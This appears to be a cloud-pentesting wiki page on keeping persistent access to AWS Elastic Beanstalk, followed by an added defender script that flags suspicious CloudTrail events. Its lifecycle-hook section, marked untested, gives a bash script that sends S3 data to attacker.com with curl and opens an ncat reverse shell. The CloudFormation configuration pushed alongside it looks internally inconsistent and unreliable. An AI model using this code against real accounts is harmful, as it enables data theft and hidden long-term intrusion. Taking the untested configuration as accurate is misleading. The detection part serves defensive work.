AWS - Elastic Beanstalk Persistence


Elastic Beanstalk

For more information check:

Persistence in Instance

To maintain persistence inside the AWS account, a persistence mechanism can be introduced inside the instance (cron job, SSH key...) so that the attacker can access it and steal the IAM role credentials from the metadata service.

Backdoor in Version

An attacker could backdoor the code inside the S3 repo so that it always executes the backdoor as well as the expected code.

New backdoored version

Instead of changing the code of the actual version, the attacker could deploy a new backdoored version of the application.

Abusing Custom Resource Lifecycle Hooks

TODO: Test

Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account.

```bash
# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
  AWSEBAutoScalingGroup:
    Metadata:
      AWS::ElasticBeanstalk::Ext:
        TriggerConfiguration:
          triggers:
            - name: stealthy-lifecycle-hook
              events:
                - "autoscaling:EC2_INSTANCE_LAUNCH"
                - "autoscaling:EC2_INSTANCE_TERMINATE"
              target:
                ref: "AWS::ElasticBeanstalk::Environment"
                arn:
                  Fn::GetAtt:
                    - "AWS::ElasticBeanstalk::Environment"
                    - "Arn"
  stealthyLifecycleHook:
    Type: AWS::AutoScaling::LifecycleHook
    Properties:
      AutoScalingGroupName:
        Ref: AWSEBAutoScalingGroup
      LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
      NotificationTargetARN:
        Ref: stealthy-lifecycle-hook
      RoleARN:
        Fn::GetAtt:
          - AWSEBAutoScalingGroup
          - Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
```
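Added example (not part of the original page): a defender-side triage of CloudTrail records for the changes described above, namely writes to the source-bundle bucket, new application versions, environment updates and lifecycle hook changes made by a principal outside the deployment pipeline. The sample records, account ID, principal names and the `ci-deploy` allowlist are constructed, and the `elasticbeanstalk-` bucket prefix assumes the default Elastic Beanstalk bucket naming.

```python
import json

# (eventSource, eventName) pairs for the changes this page describes.
WATCHED = {
    ("elasticbeanstalk.amazonaws.com", "CreateApplicationVersion"): "new application version",
    ("elasticbeanstalk.amazonaws.com", "UpdateEnvironment"): "environment version/config change",
    ("autoscaling.amazonaws.com", "PutLifecycleHook"): "lifecycle hook added or changed",
    # Only logged when S3 data events are enabled on the trail.
    ("s3.amazonaws.com", "PutObject"): "write to source-bundle bucket",
}

def triage(records, approved_prefixes, bundle_bucket_prefix="elasticbeanstalk-"):
    """Return watched events made by principals outside the deployment allowlist."""
    findings = []
    for rec in records:
        key = (rec.get("eventSource"), rec.get("eventName"))
        if key not in WATCHED:
            continue
        params = rec.get("requestParameters") or {}
        bucket = params.get("bucketName") or ""
        if key[1] == "PutObject" and not bucket.startswith(bundle_bucket_prefix):
            continue  # S3 write to a bucket that does not hold source bundles
        actor = (rec.get("userIdentity") or {}).get("arn", "unknown")
        if any(actor.startswith(p) for p in approved_prefixes):
            continue  # expected deployment pipeline
        findings.append({"time": rec.get("eventTime"), "actor": actor,
                         "event": key[1], "why": WATCHED[key]})
    return findings

# Constructed sample records; all identifiers are placeholders.
CI = "arn:aws:sts::111122223333:assumed-role/ci-deploy/build-42"
USER = "arn:aws:iam::111122223333:user/example-user"
EB, ASG, S3 = "elasticbeanstalk.amazonaws.com", "autoscaling.amazonaws.com", "s3.amazonaws.com"
SAMPLE = json.loads(json.dumps([
    {"eventTime": "2024-01-01T10:00:00Z", "eventSource": EB, "eventName": "CreateApplicationVersion", "userIdentity": {"arn": CI}},
    {"eventTime": "2024-01-01T11:00:00Z", "eventSource": EB, "eventName": "UpdateEnvironment", "userIdentity": {"arn": USER}, "requestParameters": {"environmentName": "my-env"}},
    {"eventTime": "2024-01-01T11:05:00Z", "eventSource": ASG, "eventName": "PutLifecycleHook", "userIdentity": {"arn": USER}},
    {"eventTime": "2024-01-01T11:10:00Z", "eventSource": S3, "eventName": "PutObject", "userIdentity": {"arn": USER}, "requestParameters": {"bucketName": "elasticbeanstalk-us-east-1-111122223333"}},
    {"eventTime": "2024-01-01T11:15:00Z", "eventSource": S3, "eventName": "PutObject", "userIdentity": {"arn": USER}, "requestParameters": {"bucketName": "example-logs"}},
    {"eventTime": "2024-01-01T11:20:00Z", "eventSource": EB, "eventName": "DescribeEnvironments", "userIdentity": {"arn": USER}},
]))
APPROVED = ["arn:aws:sts::111122223333:assumed-role/ci-deploy/"]

if __name__ == "__main__":
    for finding in triage(SAMPLE, APPROVED):
        print(finding)
```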